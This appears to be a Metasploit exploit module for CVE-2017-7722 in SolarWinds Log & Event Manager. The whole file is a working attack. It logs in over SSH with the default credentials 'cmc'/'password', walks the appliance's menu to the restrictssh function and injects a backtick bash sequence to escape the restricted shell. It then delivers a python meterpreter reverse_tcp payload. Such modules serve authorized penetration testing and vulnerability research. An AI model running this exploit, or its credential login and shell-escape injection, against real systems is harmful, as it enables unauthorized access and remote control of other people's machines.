1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::SSH
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'SolarWinds LEM Default SSH Password Remote Code Execution',
16
        'Description' => %q{
17
          This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH
18
          service is accessed with the default username and password which is "cmc" and "password". By exploiting a
19
          vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
20

21
          This module was tested against SolarWinds LEM v6.3.1.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Mehmet Ince <[email protected]>', # discovery & msf module
26
        ],
27
        'References' => [
28
          ['CVE', '2017-7722'],
29
          ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'],
30
          ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
31
        ],
32
        'DefaultOptions' => {
33
          'Payload' => 'python/meterpreter/reverse_tcp'
34
        },
35
        'Platform' => ['python'],
36
        'Arch' => ARCH_PYTHON,
37
        'Targets' => [ ['Automatic', {}] ],
38
        'Privileged' => false,
39
        'DisclosureDate' => '2017-03-17',
40
        'DefaultTarget' => 0,
41
        'Notes' => {
42
          'Stability' => [CRASH_SAFE],
43
          'Reliability' => [REPEATABLE_SESSION],
44
          'SideEffects' => []
45
        }
46
      )
47
    )
48

49
    register_options(
50
      [
51
        Opt::RPORT(32022),
52
        OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]),
53
        OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]),
54
      ]
55
    )
56

57
    register_advanced_options(
58
      [
59
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
60
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
61
      ]
62
    )
63
  end
64

65
  def rhost
66
    datastore['RHOST']
67
  end
68

69
  def rport
70
    datastore['RPORT']
71
  end
72

73
  def username
74
    datastore['USERNAME']
75
  end
76

77
  def password
78
    datastore['PASSWORD']
79
  end
80

81
  def exploit
82
    opts = ssh_client_defaults.merge({
83
      auth_methods: ['keyboard-interactive'],
84
      port: rport,
85
      password: password
86
    })
87

88
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
89

90
    print_status("#{rhost}:#{rport} - Attempting to login...")
91

92
    begin
93
      ssh = nil
94
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
95
        ssh = Net::SSH.start(rhost, username, opts)
96
      end
97
    rescue Rex::ConnectionError
98
      return
99
    rescue Net::SSH::Disconnect, ::EOFError
100
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
101
      return
102
    rescue ::Timeout::Error
103
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104
      return
105
    rescue Net::SSH::AuthenticationFailed
106
      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
107
    rescue Net::SSH::Exception => e
108
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
109
      return
110
    end
111

112
    return unless ssh
113

114
    print_good('SSH connection is established.')
115

116
    payload_executed = false
117

118
    ssh.open_channel do |channel|
119
      print_status('Requesting pty... We need it in order to interact with menuing system.')
120

121
      channel.request_pty do |ch, pty_success|
122
        raise 'Could not request pty!' unless pty_success
123

124
        print_good('Pty successfully obtained.')
125

126
        print_status('Requesting a shell.')
127
        ch.send_channel_request('shell') do |_ch, shell_success|
128
          raise 'Could not open shell!' unless shell_success
129

130
          print_good('Remote shell successfully obtained.')
131
        end
132
      end
133

134
      channel.on_data do |_ch, data|
135
        if data.include? 'cmc '
136
          print_good('Step 1 is done. Managed to access terminal menu.')
137
          channel.send_data("service\n")
138
        end
139

140
        if data.include? 'service '
141
          print_good("Step 2 is done. Managed to select 'service' sub menu.")
142
          channel.send_data("restrictssh\n")
143
        end
144

145
        if data.include? 'Press <enter> to configure restriction on the SSH service to the Manager Appliance'
146
          print_good("Step 3 is done. Managed to start 'restrictssh' function.")
147
          channel.send_data("*#`bash>&2`\n")
148
        end
149

150
        if data.include? 'Are the hosts'
151
          print_good('Step 4 is done. We are going to try escape from jail shell.')
152
          channel.send_data("Y\n")
153
        end
154

155
        if data.include?('/usr/local/contego') && (payload_executed == false)
156
          print_good('Sweet..! Escaped from jail.')
157
          print_status('Delivering payload...')
158
          channel.send_data("python -c \"#{payload.encoded}\"\n")
159
          payload_executed = true
160
        end
161
      end
162
    end
163
    begin
164
      ssh.loop unless session_created?
165
    rescue Errno::EBADF => e
166
      elog(e)
167
    end
168
  end
169
end
170

171